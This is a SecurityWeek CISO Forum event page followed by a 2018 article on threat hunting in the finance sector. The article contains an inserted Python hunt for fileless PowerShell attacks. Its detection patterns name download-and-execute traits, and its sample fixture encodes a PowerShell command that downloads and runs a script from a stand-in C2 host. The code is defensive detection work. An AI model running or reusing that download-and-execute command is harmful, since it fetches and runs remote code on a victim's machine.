A SecurityWeek Event

A VIRTUAL EVENT FOR 2023

An Exclusive Forum For
Information Security Leaders

June 13-14th, 2023

2023 Diamond Sponsor

Palo Alto Networks

2023 Platinum Sponsors

Abnormal
CardinalOps

2023 Gold Sponsors

ReversingLabs
Uptycs
Proofpoint
Lacework
Eclypsium
Saviynt
Synopsys

2023 Featured Speakers

Adam Ely
Fidelity
CISO

Shaun Marion
McDonald’s
VP, CISO

Kathy Wang
Discord
CSO

Lena Smart
MongoDB
CISO

Jason Shockey
Cenlar FSB
SVP, CISO

Igor Varnava
Five9
SVP, CISO

Brian Markham
EAB
CISO

Chris Castaldo
Crossbeam
CISO

Michael Piacente
Hitch Partners
Managing Partner

Evan Wolff
Crowell & Moring
Partner

Jonathan Jaffe
Lemonade
CISO

2023 Agenda is Coming Soon

Designed for senior-level cybersecurity leaders to discuss, share and learn innovative information security and risk management strategies, SecurityWeek’s CISO Forum will take place in 2023 as a virtual event.

Throughout this two-day virtual event, sessions will have a strong focus on participation from CISOs in panel discussions along with talks from industry experts, analysts and other end users, and thought leadership, strategy and technical sessions.

Through a cutting-edge platform, attendees will be able to interact with speakers and sponsors, and visit networking lounges, subject-specific discussion areas, and sponsor booths in a virtual expo hall.


An Exclusive Executive Forum Focused on Cybersecurity Leadership and Strategy


Previous CISO Forum Speakers

Adrian Stone
Peloton
VP, CISO

Anne Marie Zettlemoyer
Mastercard
VP, Security Engineering

Caleb Sima
Robinhood
CISO

Allan Friedman
Cybersecurity and Infrastructure Security Agency (CISA)
SBOM Champion

Summer Craze Fowler
Argo AI
CISO/CIO

Fredrick ‘Flee’ Lee
Gusto
Chief Security Officer

Shaila Shankar
Cisco
SVP and General Manager of Cisco Cloud Network and Security

Jonathan Jaffe
Lemonade
CISO

Aanchal Gupta
Microsoft
VP, Azure Security

Lena Smart
MongoDB
CISO

Sounil Yu
JupiterOne
CISO

Theresa Payton
Former White House CIO
Star of CBS TV series, “Hunted”, and Leading Cybersecurity Expert

CISO Survey Shows Importance of Threat Hunting in the Finance Sector

05/22/2018

Attackers Hide in Plain Sight as Threat Hunting Lags

(Kevin Townsend – SecurityWeek) – The finance sector has one of the most robust cybersecurity postures in industry. It is heavily regulated, frequently attacked, and well-resourced — but not immune to cybercriminals. Ninety percent of financial institutions were targeted by ransomware alone in the past 12 months.

Endpoint protection firm Carbon Black surveyed the CISOs of 40 major financial institutions during April 2018 to understand how the finance sector is attacked and what concerns its defenders. Two things most stand out: nearly half (44%) of financial institutions are concerned about the security posture of their technology service providers (TSPs — the supply chain); and despite their resources, only 37% have established threat hunting teams.

Concern over the supply chain is not surprising. Cybercriminals are increasingly attacking third parties (who may be less well-protected or have their own security issues) to gain access to the primary target. The Federal Deposit Insurance Corporation (FDIC) is also concerned about the supply chain, and has developed an examination process that includes reviewing public information about the TSPs and their software.

One of the areas that concerns the FDIC is consolidation within the service provider industry. “For example,” it notes, “a flawed acquisition strategy may weaken the financial condition of the acquirer, or a poorly planned integration could heighten operational or security risk.”

Carbon Black recommends that this potential risk be countered by hunt teams and defenders closely assessing their TSP security posture. But, it adds, “Given that 63% of financial institutions have yet to establish threat hunting teams, there should be concern regarding limited visibility into exposure created by TSPs.”

Carbon Black also considers threat hunting important for detecting direct attacks, for two primary reasons. The first is the increasing tendency for attackers to use fileless attacks that are not easily detected by standard technology. The second is a growing willingness among attackers to engage in counter-countermeasures; that is, to counter the defender’s incident response.

Fileless attacks are increasing across all industry sectors. A typical attack might involve a Flash vulnerability. Flash invokes PowerShell, feeding instructions via the command line. PowerShell then connects to a stealth C&C server, from where it downloads a more extensive PowerShell script that performs the attack. All of this is done in memory — no malware file is downloaded and there is nothing for traditional technology defenses to detect.

“Active threat hunting,” says Carbon Black, “puts defenders ‘on the offensive’ rather than simply reacting to the deluge of daily alerts.” It “aims to find abnormal activity on servers and endpoints that may be signs of compromise, intrusion or exfiltration of data. Though the concept of threat hunting isn’t new, for many organizations the very idea of threat hunting is.”
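A hunt for the fileless chain described above (a browser or document process starting PowerShell with download-and-run arguments), as an added example that is not from the article or from Carbon Black. The event field names are modeled on process-creation telemetry, and the parent list, host names, URLs and sample records are constructed assumptions.

```python
import base64
import re
# Processes that host Flash content or documents and rarely need a shell (assumed list).
SUSPECT_PARENTS = {"iexplore.exe", "chrome.exe", "firefox.exe", "winword.exe", "excel.exe"}
# Command-line traits of download-and-run-in-memory PowerShell.
TRAITS = {
    "download": re.compile(r"downloadstring|net\.webclient|invoke-webrequest", re.I),
    "in_memory_exec": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hid", re.I),
}
ENCODED = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def decode_encoded_command(cmdline):
    """Return the -EncodedCommand payload (base64 of UTF-16LE text), or ''."""
    m = ENCODED.search(cmdline)
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le") if m else ""
    except (ValueError, UnicodeDecodeError):
        return ""

def hunt(events):
    """Flag PowerShell started by a suspect parent that also shows a fileless trait.
    The parent anomaly alone is noisy, so a command-line trait is required too."""
    findings = []
    for ev in events:
        if basename(ev["Image"]) != "powershell.exe":
            continue
        decoded = decode_encoded_command(ev["CommandLine"])
        text = ev["CommandLine"] + " " + decoded
        reasons = [name for name, rx in TRAITS.items() if rx.search(text)]
        if decoded:
            reasons.append("encoded_command")
        if basename(ev["ParentImage"]) in SUSPECT_PARENTS and reasons:
            findings.append({"host": ev["Host"], "reasons": sorted(reasons)})
    return findings

# Constructed sample records; the encoded text exists only to exercise the decoder.
SAMPLE_B64 = base64.b64encode("IEX (New-Object Net.WebClient).DownloadString("
                              "'http://c2.example.invalid/s')".encode("utf-16-le")).decode()
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Host": h, "ParentImage": p, "Image": PS, "CommandLine": c} for h, p, c in [
        ("WS-014", r"C:\Program Files\Internet Explorer\iexplore.exe", "powershell.exe -nop -w hidden -enc " + SAMPLE_B64),
        ("SRV-02", r"C:\Windows\System32\svchost.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
        ("WS-020", r"C:\Windows\explorer.exe", "powershell.exe Invoke-WebRequest https://intranet.example.invalid/t.zip"),
    ]]
```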

But the need for threat hunting goes beyond simple detection of intrusion. “Attackers are able to go off their scripts while defenders are sticking to manual and automated playbooks,” warns Carbon Black. “These playbooks are generally based off simple indicators of compromise (IoCs). As a result, security teams are often left thinking they have disrupted the attacker but, with counter incident response, attackers maintain the upper hand.”

Compounding this, attackers are beginning to incorporate a secondary command and control in case one is discovered or disrupted. Carbon Black notes that this tactic has already been found in 10% of victims, and predicts it is a tactic that will grow in future months. The principle is that an attacker’s ability to improvise and change direction at speed is best countered by a human defender rather than simply a pre-programmed set of incident response steps.

“Financial institutions,” suggests Carbon Black, “should aim to improve situational awareness and visibility into the more advanced attacker movements post breach. This must be accompanied with a tactical paradigm shift from prevention to detection. The increasing attack surface, coupled with the utilization of advanced tactics, has allowed attackers to become invisible. Decreasing dwell time is the true return on investment for any cybersecurity program.”

In reality, of course, this does not just apply to the finance sector. The same evolving methodology is being used by attackers across all industry sectors. The need for threat hunting is not limited to finance. “All sectors should take heed,” Carbon Black chief cybersecurity officer Tom Kellermann told SecurityWeek. “Generally speaking, financial services tend to be the most secure as they’ve come under attack with high-profile attack campaigns in recent years.” The implication is that if the finance sector is slow to switch to active threat hunting, other sectors will be slower.

In April 2018, Carbon Black filed an S-1 registration statement with the U.S. Securities and Exchange Commission (SEC) for a proposed initial public offering (IPO) of its common stock. Shares of the company (NASDAQ: CBLK) jumped 26% on its first day of trading on May 4. The company has a market capitalization of nearly $1.6 billion at the time of publishing. The company emerged in its current form after its purchase by Bit9 in February 2014.

